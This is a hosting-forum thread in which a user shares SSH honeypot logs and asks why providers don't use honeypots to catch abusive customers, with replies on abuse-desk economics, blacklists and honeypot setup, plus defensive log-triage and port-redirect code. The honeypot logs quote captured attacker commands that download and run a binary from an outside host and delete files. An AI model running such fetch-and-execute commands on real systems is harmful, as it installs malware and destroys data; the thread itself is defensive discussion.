Why don't providers act against abusers on their network?

bulbasaurbulbasaur Member
edited February 2021 in General

I've been a passive observer of /var/log/auth.log, but wondered what would happen if the attackers managed to get in. So, I wrote a small SSH honeypot that accepts any username and password, and within minutes I had IPs from DigitalOcean, OVH, BuyVM, and others trying to install malware:

{"ts": "2021-02-25 13:07:42 UTC", "ip": "161.35.212.151", "dport": 22, "username": "oracle", "password": "oracle", "allow": true}
{"ts": "2021-02-25 13:07:42 UTC", "ip": "161.35.212.151", "dport": 22, "username": "oracle", "exec_cmd": "lscpu ; wget redacted.com/redacted ; chmod +x * ; ./ninfo ; rm -rf *"}
{"ts": "2021-02-25 14:05:46 UTC", "ip": "154.223.166.124", "dport": 22, "username": "root", "password": "p@55word", "allow": true}
{"ts": "2021-02-25 14:05:47 UTC", "ip": "154.223.166.124", "dport": 22, "username": "root", "exec_cmd": "#!/bin/sh\nPATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\nwget http://154.223.166.124/443\ncurl -O http://154.223.166.124/443\nchmod +x 443\n./443\n"}
{"ts": "2021-02-25 14:05:51 UTC", "ip": "154.223.166.124", "dport": 22, "username": "root", "exec_cmd": "ls -la /var/run/gcc.pid"}

My question is - why don't providers adopt such techniques to detect and boot abusers off their networks? The usual answer that I keep hearing is "how would they know"?

But, it seems all they need to do is run a honeypot of a similar kind on a few networks, and as soon as their IPs connect to their honeypots, they suspend the abuser (or at least, serve a notice to which they must reply within a day).

Thanked by 2AlwaysSkint Tsukihi
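A triage pass over honeypot lines in the format shown above, as an added example that is not part of the original post: it parses the JSON events, groups them per source IP, pulls the download targets out of executed commands, and checks which hits come from a set of prefixes the (hypothetical) provider owns. The two provider prefixes, the failed-login line and the malformed line are constructed; the other log lines are the ones quoted in the post.

```python
"""Triage SSH-honeypot JSON log lines against a provider's own prefixes.

Added example, not the original poster's honeypot code. Each log line is one
JSON object with ts/ip/dport/username plus either password/allow (a login
attempt) or exec_cmd (a command run after a successful login).
"""
import ipaddress
import json
import re

# Constructed: netblocks the hypothetical provider announces.
OWN_PREFIXES = [ipaddress.ip_network(p) for p in ("161.35.0.0/16", "2001:db8::/32")]

# Sample input: the lines quoted in the post, plus one constructed failed login
# and one constructed malformed line to exercise the skip path.
SAMPLE_LOG = r'''
{"ts": "2021-02-25 13:07:42 UTC", "ip": "161.35.212.151", "dport": 22, "username": "oracle", "password": "oracle", "allow": true}
{"ts": "2021-02-25 13:07:42 UTC", "ip": "161.35.212.151", "dport": 22, "username": "oracle", "exec_cmd": "lscpu ; wget redacted.com/redacted ; chmod +x * ; ./ninfo ; rm -rf *"}
{"ts": "2021-02-25 14:05:46 UTC", "ip": "154.223.166.124", "dport": 22, "username": "root", "password": "p@55word", "allow": true}
{"ts": "2021-02-25 14:05:47 UTC", "ip": "154.223.166.124", "dport": 22, "username": "root", "exec_cmd": "#!/bin/sh\nPATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\nwget http://154.223.166.124/443\ncurl -O http://154.223.166.124/443\nchmod +x 443\n./443\n"}
{"ts": "2021-02-25 14:05:51 UTC", "ip": "154.223.166.124", "dport": 22, "username": "root", "exec_cmd": "ls -la /var/run/gcc.pid"}
{"ts": "2021-02-25 14:06:00 UTC", "ip": "198.51.100.7", "dport": 22, "username": "admin", "password": "admin", "allow": false}
not json at all
'''

# Target of a wget/curl, skipping any leading option flags such as "-O".
FETCH_RE = re.compile(r"\b(?:wget|curl)\s+(?:-\S+\s+)*(\S+)")


def parse_lines(text):
    """Return the well-formed events; malformed lines are skipped, not fatal."""
    events = []
    for raw in text.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        try:
            ev = json.loads(raw)
        except json.JSONDecodeError:
            continue
        if isinstance(ev, dict) and "ip" in ev:
            events.append(ev)
    return events


def is_own(ip, prefixes):
    """True if the source address falls inside one of the provider's prefixes."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in prefixes)


def triage(text, prefixes):
    """Per-IP summary: ownership, attempt/login counts, commands, fetch targets."""
    report = {}
    for ev in parse_lines(text):
        entry = report.setdefault(ev["ip"], {
            "ours": is_own(ev["ip"], prefixes),
            "attempts": 0, "logins": 0, "cmds": [], "urls": set(),
        })
        if "password" in ev:
            entry["attempts"] += 1
            if ev.get("allow"):
                entry["logins"] += 1
        cmd = ev.get("exec_cmd")
        if cmd:
            entry["cmds"].append(cmd)
            entry["urls"].update(FETCH_RE.findall(cmd))
    for entry in report.values():
        entry["urls"] = sorted(entry["urls"])
    return report


def own_hits(report):
    """IPs the provider could act on: inside its prefixes and past the login stage."""
    return sorted(ip for ip, e in report.items() if e["ours"] and (e["logins"] or e["cmds"]))


if __name__ == "__main__":
    rep = triage(SAMPLE_LOG, OWN_PREFIXES)
    for ip, e in rep.items():
        print(ip, "ours" if e["ours"] else "elsewhere", e["logins"], "logins", e["urls"])
    print("actionable:", own_hits(rep))
```

Most of what the honeypot sees will fall outside the provider's own prefixes, which is the point of the `own_hits` filter.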

Comments

  • What did they say when you reported the intrusion to them?

  • DataIdeas-JoshDataIdeas-Josh Member, Patron Provider

    A lot of times it stays under the standard resource abuse limits so we don't get notifications. Also if nobody tells us about it then we don't know about it.
    Also you might want to check if the abuse is coming from TOR nodes as that can sometimes send out what you are seeing.
    ~Josh

    Thanked by 1jar
  • lentrolentro Member, Host Rep
    edited February 2021

    @DataIdeas-Josh said: A lot of times it stays under the standard resource abuse limits so we don't get notifications. Also if nobody tells us about it then we don't know about it.

    I think OP is asking why providers don't take proactive measures like setting up honeypots.

    Thanked by 1AlwaysSkint
  • jarjar Patron Provider, Top Host, Veteran
    edited February 2021

    Most often they do, the better questions are:

    1. Why don't they do what I want them to in the time frame that I want them to do it?
    2. Why don't they tell me in full detail what struggles they're having in keeping this particular abuse under control?
    3. What are the unique variables about this situation that form the greater context?

    And the short answer is that it's none of your business and sometimes the answers might violate their privacy policy and/or legal obligations. If you think they can't keep it under control and it bothers you, block their ranges.

    @stevewatson301 said: But, it seems all they need to do is run a honeypot of a similar kind on a few networks, and as soon as their IPs connect on their honeypots

    And are their customers demanding that, and leaving when they don't? Or do you expect them to run a charity for you, a third party that isn't paying them a dime or causing them to have any consequences?

    This is why blacklists exist, to try to crowdsource consequences for companies that might financially justify their spending to solve such things. If no one uses your blacklist to block the offending company's customers from reaching their own, then no one agrees that they deserve consequences. If no one agrees that they deserve consequences, you're probably overreacting.

    Thanked by 1mike1s
  • SGrafSGraf Member, Patron Provider

    @DataIdeas-Josh said:
    A lot of times it stays under the standard resource abuse limits so we don't get notifications. Also if nobody tells us about it then we don't know about it.
    Also you might want to check if the abuse is coming from TOR nodes as that can sometimes send out what you are seeing.
    ~Josh

    I'm +1 on this.

    If the automation doesn't catch it AND there are no external reports... then most providers will not even notice.

    That being said, I think that most providers you will find are fast when you actually file abuse reports.

    For your honeypot project: try parsing abuse addresses from sources such as whois or the RIPE database...

    As an example blocklist.de does it like this:

    ...We report.... in real time using Whois (abuse-mailbox, abuse@, security@, email, remarks), the Ripe-Abuse-Finder, and the contact-database from abusix.org so we may find the abuse-address assigned to the offending host. Our reports are based on X-Arf (Network Abuse Reporting 2.0), so the abuse-department of the provider for the attacking host may parse our reports automatically.

  • AlwaysSkintAlwaysSkint Member
    edited February 2021

    Short answer is that most providers don't give a fcuk. >:)
    (Slightly longer answer is that they expect the intended victims to protect themselves, whilst they harbour the criminal activity.)
    ((Obtuse answer is how many neighbours complain about the persistent barking from their 'friendly' neighbourhood dogs? If enough did it, would it stop? More appropriate for port scanning however.))

    Thanked by 1bulbasaur
  • randvegetarandvegeta Member, Host Rep

    @AlwaysSkint said:
    Short answer is that most providers don't give a fcuk. >:)
    (Slightly longer answer is that they expect the intended victims to protect themselves, whilst they harbour the criminal activity.)
    ((Obtuse answer is how many neighbours complain about the persistent barking from their 'friendly' neighbourhood dogs? If enough did it, would it stop? More appropriate for port scanning however.))

    It's not so much they (we) don't give a fcuk. It's more that we don't go looking for reasons to reduce our revenue stream.

    If it's reported in a clear and reasonable way, usually (at least for us) we take action.

    I do ignore a lot of 'abuse' reports. The ones that are extremely vague, unclear, inconclusive. Usually it's not a hacking related report. The most common reports we ignore are DMCA Take Down requests that DON'T include our IP.

    They report a domain WITHOUT an IP and the domain resolves to some other IP, such as Cloudflare. Yeah, I'm not going to waste time following up with Cloudflare. In any case, we block Cloudflare emails.

    Generally speaking, if I get an abuse report that requires more than 5 mins to verify, it gets ignored. Especially when the request is coming from a commercial service who gets paid to make take down requests. Like WTF? Do your job and fill in the blanks for me, so I don't need to do your work for you! They get paid to make a case to make take down requests, so they should do the research and provide it in a clear format to the host and make it easy for the host to say "YES! THAT IS ABUSE" and shut it down. The 5 minute rule applies. Time is money and that's all the free time I'm willing to give.

    Thanked by 2jar feezioxiii
  • DataIdeas-JoshDataIdeas-Josh Member, Patron Provider

    @randvegeta said: The most common reports we ignore are DMCA Take Down requests that DON'T include our IP.

    They report a domain WITHOUT an IP and the domain resolves to some other IP, such as Cloudflare. Yeah, I'm not going to waste time following up with Cloudflare. In any case, we block Cloudflare emails.

    Thisss here really gets on my nerves and then the complainer is consistently sending emails saying take it down but refuses to send PROOF that it's coming from our IPs.

  • randvegetarandvegeta Member, Host Rep

    @DataIdeas-Josh said:

    @randvegeta said: The most common reports we ignore are DMCA Take Down requests that DON'T include our IP.

    They report a domain WITHOUT an IP and the domain resolves to some other IP, such as Cloudflare. Yeah, I'm not going to waste time following up with Cloudflare. In any case, we block Cloudflare emails.

    Thisss here really gets on my nerves and then the complainer is consistently sending emails saying take it down but refuses to send PROOF that it's coming from our IPs.

    Yes, if they keep sending bogus reports, their email gets blocked. This is actually why we blocked Cloudflare.

    Cloudflare doesn't want to handle this shit manually so they simply automate their report forwarding. In one case in particular, we responded to Cloudflare to inform them that the report was invalid and no actual abuse was taking place. They do not care. They simply keep forwarding. I asked how to get them to stop forwarding as there was NO ABUSE, to which they replied, we must remove the website being reported. Since it's ridiculous to remove a website that is violating no laws, we simply blocked Cloudflare.

    Following up on abuse reports takes time. The onus should be on the reporter to provide as much information as possible. No info, no action. Simple

    Thanked by 1mike1s
  • @randvegeta said:

    @DataIdeas-Josh said:

    @randvegeta said: The most common reports we ignore are DMCA Take Down requests that DON'T include our IP.

    They report a domain WITHOUT an IP and the domain resolves to some other IP, such as Cloudflare. Yeah, I'm not going to waste time following up with Cloudflare. In any case, we block Cloudflare emails.

    Thisss here really gets on my nerves and then the complainer is consistently sending emails saying take it down but refuses to send PROOF that it's coming from our IPs.

    Yes, if they keep sending bogus reports, their email gets blocked. This is actually why we blocked Cloudflare.

    Cloudflare doesn't want to handle this shit manually so they simply automate their report forwarding. In one case in particular, we responded to Cloudflare to inform them that the report was invalid and no actual abuse was taking place. They do not care. They simply keep forwarding. I asked how to get them to stop forwarding as there was NO ABUSE, to which they replied, we must remove the website being reported. Since it's ridiculous to remove a website that is violating no laws, we simply blocked Cloudflare.

    Following up on abuse reports takes time. The onus should be on the reporter to provide as much information as possible. No info, no action. Simple

    THIS. I would say most providers will respond to a valid abuse report. Can't expect us to do anything if you're providing garbage data.

  • HostSlickHostSlick Member, Patron Provider
    edited February 2021

    Well. It happens.

    Maybe there was no report yet.

    Once I had no abuse complaint when suddenly the authorities seized the customer's dedicated server for such attacks. Ransomware attacks against another government in the EU, according to the documents.

  • nice question. noted myself here for further study. thanks

  • I'm just going to leave this here. https://github.com/DigitalRuby/IPBan

    One of the better automatic abuse reporters.

    Thanked by 1AlwaysSkint
  • @jar said: And are their customers demanding that, and leaving when they don't? Or do you expect them to run a charity for you, a third party that isn't paying them a dime or causing them to have any consequences?

    Not sure what you're trying to get at:

    1. Is it also not in the interest of the provider in order to boot abusers off their network?

    2. I find it hard to believe that the provider will go bankrupt running 10 honeypots on a $3 VPS, for a monthly expense of $30. (The goal is not to catch all abusers, which you can't anyway if they're using it for targeted attacks.)

    Thanked by 1AlwaysSkint
  • DataIdeas-JoshDataIdeas-Josh Member, Patron Provider

    Automatic abuse reporters are annoying.

    Thanked by 1randvegeta
  • DataIdeas-JoshDataIdeas-Josh Member, Patron Provider

    @stevewatson301 said:

    @jar said: And are their customers demanding that, and leaving when they don't? Or do you expect them to run a charity for you, a third party that isn't paying them a dime or causing them to have any consequences?

    Not sure what you're trying to get at:

    1. Is it also not in the interest of the provider in order to boot abusers off their network?

    2. I find it hard to believe that the provider will go bankrupt running 10 honeypots on a $3 VPS, for a monthly expense of $30. (The goal is not to catch all abusers, which you can't anyway if they're using it for targeted attacks.)

    And how much resources do you think the honeypots ACTUALLY take??? CPU/RAM etc.

  • @DataIdeas-Josh said: And how much resources do you think the honeypots ACTUALLY take??? CPU/RAM etc.

    I don't "think", they actually run on 512 MB Lightsail instances and the examples that I showed in my original post are actually from one of those instances.

  • jarjar Patron Provider, Top Host, Veteran
    edited February 2021

    @stevewatson301 said:

    @jar said: And are their customers demanding that, and leaving when they don't? Or do you expect them to run a charity for you, a third party that isn't paying them a dime or causing them to have any consequences?

    Not sure what you're trying to get at:

    1. Is it also not in the interest of the provider in order to boot abusers off their network?

    2. I find it hard to believe that the provider will go bankrupt running 10 honeypots on a $3 VPS, for a monthly expense of $30. (The goal is not to catch all abusers, which you can't anyway if they're using it for targeted attacks.)

    Why should they? They don't exist to make you feel good. They're businesses. It's the job of you and their customers to make them care. If you can't and their customers won't, they have no incentive. Don't assume that your values are universally shared as priorities. They don't hire people to care about your concerns if you're not a customer.

    That's how we get back to blacklists: a commonly used method to generate incentive. If you can become the concern of their customers then you can influence their behavior. If you can't, then you will not have made a good enough case to be worthy of their investment into what you want.

    Most of the attacks come from poorly secured wordpress sites and the reality is that these people running them are a backbone of the industry. Scaling down a web host by tossing out these customers to make third parties feel good doesn't reduce abuse, it just makes one hosting provider smaller and the one that doesn't give a shit about your opinion larger.

    Honestly those people won't even believe that they're the problem. They'll blame their web host for their wordpress site getting hacked because "I didn't touch it and it was fine last week so must be your problem." They won't get better at hosting their websites and they won't spend a dime over $15 to deal with it, they'll keep moving until they find the provider that lets them be irresponsible. The customers don't care if their 6 year old wordpress site is brute forcing your server, doesn't bother them.

    That's the real truth of the internet. That's why they're not out there hiring teams of people waiting for you to tell them how many customers to get rid of every day. Trading their revenue for no long term net impact on the end result is of zero interest to them.

    If you can't tell I've been on every side of this issue at some point, so I feel pretty strongly that I understand the perspective of everyone involved. At HostGator I talked to the shitty wordpress customers who blamed me every day for their failure to update anything ever. At DigitalOcean I dealt with the most arrogant abuse reporters who thought I owed them action against my customers. At MXroute I deal with the inbound abuse from shitty hosts that ignore complaints. Everyone has an angle, but influence is easiest when you understand all of them.

    Thanked by 2bulbasaur DataWagon
  • bulbasaurbulbasaur Member
    edited February 2021

    @jar said: Scaling down a web host by tossing out these customers to make third parties feel good doesn't reduce abuse, it just makes one hosting provider smaller and the one that doesn't give a shit about your opinion larger.

    That's a valuable insight, I appreciate it :smile:

    So, it's just a case of "because no one else is doing it, customers would leave the host that enforces such terms", and maybe regulation in this respect is the only way forward.

    Thanked by 1jar
  • DataIdeas-JoshDataIdeas-Josh Member, Patron Provider

    Honestly just look at this website. There are hosting providers that pop up and die in the same year. The bigger hosts that are here deal with abuse accordingly when given proper proof that said abuse is from their services.
    That is a lot more than you can say for the big providers (AWS, Google, Azure, DO, Vultr, etc.)
    Stricter regulation will cause those big providers to become even bigger because they can get away with stuff the smaller hosts cannot.

    Thanked by 1jar
  • bulbasaurbulbasaur Member
    edited February 2021

    @DataIdeas-Josh said: Stricter regulation will cause those big providers to become even bigger because they can get away with stuff the smaller hosts cannot.

    That might be an uncharitable view, but regulations do increase costs for everyone, which means startups or small businesses are disproportionately affected.

    Appreciate your and @jar's views -- it was a transformative experience to be exposed to the view of the business owner or the support rep who has to deal with the underlying problem, which they can't address directly because of societal and economic constraints.

    Thanked by 1jar
  • jsgjsg Member, Resident Benchmarker
    edited February 2021

    @stevewatson301

    Rule no. 1: There are no cushions and you are alone in the internet jungle.
    Rule no. 2: The states, police, etc. are not up to par nor do they really care.
    Rule no. 3: The true and only god of both companies and states is profit. You the customer and citizen are but an irritating necessity.
    Rule no. 4: Consumers don't really care, much less learn or act responsibly. They want to consume.

    (There are, of course sadly rare exceptions).

    Hence what is an abuser to you is a source of revenue for a provider. As long as a provider can reasonably say he didn't know, e.g. because certain (rather high) levels haven't been reached, he will not decide for your well-being but for his revenue. And there is neither clear and real determination and rules nor the capability to go against but a few high profile cases on the state's side. Hell, most states even can't protect their own infrastructure!

    The other big point is that most people not only aren't particularly smart and well educated but worse, they have a "someone will protect me" attitude, that someone typically being either the state, some (usually snake oil) product or service or some authority (e.g. "linux is secure", "those pros know what they are doing").

  • chihcherngchihcherng Veteran
    edited February 2021

    @stevewatson301 said:
    My question is - why don't providers adopt such techniques to detect and boot abusers off their networks? The usual answer that I keep hearing is "how would they know"?

    But, it seems all they need to do is run a honeypot of a similar kind on a few networks, and as soon as their IPs connect to their honeypots, they suspend the abuser (or at least, serve a notice to which they must reply within a day).

    The chance of abusers scanning their neighbors is very small. If providers do what you said, they will most likely log many IPs from others' networks, which they can't suspend.

    Providers do act when you report with proper information. I know that because sometimes they will relay the response of their customers to me. But some can't even get their abuse contact in WHOIS correct.

  • chihcherngchihcherng Veteran
    edited February 2021

    @DataIdeas-Josh said:
    And how much resources do you think the honeypots ACTUALLY take??? CPU/RAM etc.

    The smallest VPS I use for detection has 128MB RAM. It monitors 10K TCP ports with HAProxy and detected malicious connection attempts from 12K+ IPs yesterday. Detection doesn't need much CPU power.

    The most important resource is an IPv4 address, without it your detection ability will be greatly limited.

  • @chihcherng said: The smallest VPS I use for detection has 128MB RAM. It monitors 10K TCP ports with HAProxy and detected malicious connection attempts from 12K+ IPs yesterday. Detection doesn't need much CPU power.

    Is your honeypot just a "dumb" receiver of TCP connections, or do they actually provide any interaction?

    Interaction gets you many more IPs than you would otherwise, because once a vulnerable host has been detected, you get the abusers contacting from many other IPs.

  • 1. If you have a VPS for 3-5 USD/month, you can't really have outstanding protection with packet filtering, IDS/IPS on the HW level etc.
    2. For minimal security purposes, various software exists: CSF, f2b and much more.

    With service providers like Microsoft/Google etc., should they simply block any traffic if you have constant successful connections? How can a provider know whether these are the usual custom services configured on the instance? Only if it's a managed service and they get notifications of unusual activity, right? If that server is unmanaged, with no abuse reports and no cases from a client, should they log into every instance to check everything? I doubt it, unless this is part of the services. However, if this is not reported at the very beginning, you could easily claim they are playing with your personal data without asking. For sure there will be a moment when a provider will start looking at such a VPS:

    • abuse received;
    • constant load on a container/node or even a shared account, when this is noticeable because of massively degraded performance.

    No abuse reports or performance degradation, no problems in the end.

  • chihcherngchihcherng Veteran
    edited February 2021

    @stevewatson301 said:
    Is your honeypot just a "dumb" receiver of TCP connections, or do they actually provide any interaction?

    Most of those malicious connections, I believe, come from compromised systems. I just want to make the victims aware of what happened to their computers. My HAProxy is indeed a "dumb" receiver of TCP connections, as I don't have the time and technique necessary to analyze hackers' attacking strategies, nor am I interested in that. HAProxy's log has given me enough information to report those incidents.

    Interaction gets you many more IPs than you would otherwise, because once a vulnerable host has been detected, you get the abusers contacting from many other IPs.

    I am not sure. Even if it's true, what I lose due to no interaction, I can compensate for by monitoring tens of thousands of TCP ports. In fact, if your honeypot is not "forking" in nature, I would suggest that you use HAProxy to proxy as many TCP ports as possible to your honeypot. You would find even more abusers this way.

  • DataWagonDataWagon Member, Patron Provider

    @stevewatson301 said:

    @jar said: And are their customers demanding that, and leaving when they don't? Or do you expect them to run a charity for you, a third party that isn't paying them a dime or causing them to have any consequences?

    Not sure what you're trying to get at:

    1. Is it also not in the interest of the provider in order to boot abusers off their network?

    2. I find it hard to believe that the provider will go bankrupt running 10 honeypots on a $3 VPS, for a monthly expense of $30. (The goal is not to catch all abusers, which you can't anyway if they're using it for targeted attacks.)

    It's not about the resources honeypots would utilize or how much it'd cost. Providers are trying to run a business. They have 1000 things to do that take priority over setting up honeypots to catch abusers on their network. What incentive do they have to spend time setting up, managing, and maintaining honeypots? Appeasing someone who isn't a customer and doesn't pay them a dime?

    Newsflash, the primary goal of any business is to make money. No provider in their right mind is going to dedicate manpower, resources, and money to intentionally downsize their customer base.

    Don't get me wrong, no one likes abuse on their network, not the provider, nor the victims. However, you can't expect providers with thousands of clients to dedicate resources to self police their network and seek out abusers. This is the whole reason why abuse desks exist.

  • bulbasaurbulbasaur Member
    edited February 2021

    @chihcherng said: I can compensate by monitoring tens of thousands of TCP ports.

    You don't need HAProxy for that, you can just use iptables DNAT rules to forward traffic from any TCP port to your honeypot and then use getsockopt(SO_ORIGINAL_DST) to get the original destination port.

    Thanked by 1chihcherng
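The DNAT-plus-SO_ORIGINAL_DST approach described above, as an added example that is not code from the thread: a minimal Linux listener that recovers the pre-NAT destination port of each redirected connection, so one process can account for hits on every TCP port. It assumes a nat-table REDIRECT rule such as `iptables -t nat -A PREROUTING -p tcp ! --dport 22 -j REDIRECT --to-ports 2222` (constructed; REDIRECT is the DNAT-to-self variant, and the real SSH port is excluded), and the constant `SO_ORIGINAL_DST = 80` is taken from the kernel header because Python's socket module does not define it.

```python
"""Recover the original destination of a connection redirected by iptables.

Added example, not code from the thread. On Linux, after a nat-table
REDIRECT/DNAT, getsockopt(SOL_IP, SO_ORIGINAL_DST) on the accepted socket
returns the pre-NAT struct sockaddr_in, so a single listener on port 2222
can log which of the tens of thousands of ports an attacker actually hit.
"""
import socket
import struct

SO_ORIGINAL_DST = 80  # value from <linux/netfilter_ipv4.h>; not in Python's socket module


def parse_sockaddr_in(raw: bytes):
    """Decode the 16-byte struct sockaddr_in that SO_ORIGINAL_DST returns."""
    if len(raw) < 8:
        raise ValueError("short sockaddr_in")
    family = struct.unpack("=H", raw[:2])[0]   # sin_family: host byte order
    if family != socket.AF_INET:
        raise ValueError(f"unexpected address family {family}")
    port = struct.unpack("!H", raw[2:4])[0]    # sin_port: network byte order
    addr = socket.inet_ntoa(raw[4:8])          # sin_addr: 4 bytes, network order
    return addr, port


def build_sockaddr_in(addr: str, port: int) -> bytes:
    """Constructed counterpart of parse_sockaddr_in, used for offline checks."""
    return (struct.pack("=H", socket.AF_INET) + struct.pack("!H", port)
            + socket.inet_aton(addr) + b"\x00" * 8)   # sin_zero padding


def original_dst(conn: socket.socket):
    """(ip, port) the client really connected to, before the REDIRECT rule."""
    raw = conn.getsockopt(socket.SOL_IP, SO_ORIGINAL_DST, 16)
    return parse_sockaddr_in(raw)


def serve(bind_port: int = 2222):
    """Accept redirected connections and log source -> original destination."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", bind_port))
        srv.listen(128)
        while True:
            conn, (src_ip, src_port) = srv.accept()
            with conn:
                try:
                    dst_ip, dst_port = original_dst(conn)
                except OSError:
                    # Connection reached 2222 directly (no conntrack NAT entry).
                    dst_ip, dst_port = conn.getsockname()[:2]
                print(f"{src_ip}:{src_port} -> {dst_ip}:{dst_port}")


if __name__ == "__main__":
    serve()
```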
  • Some providers can take your sister for spam abuse. @cociu does that. I was at risk one time!
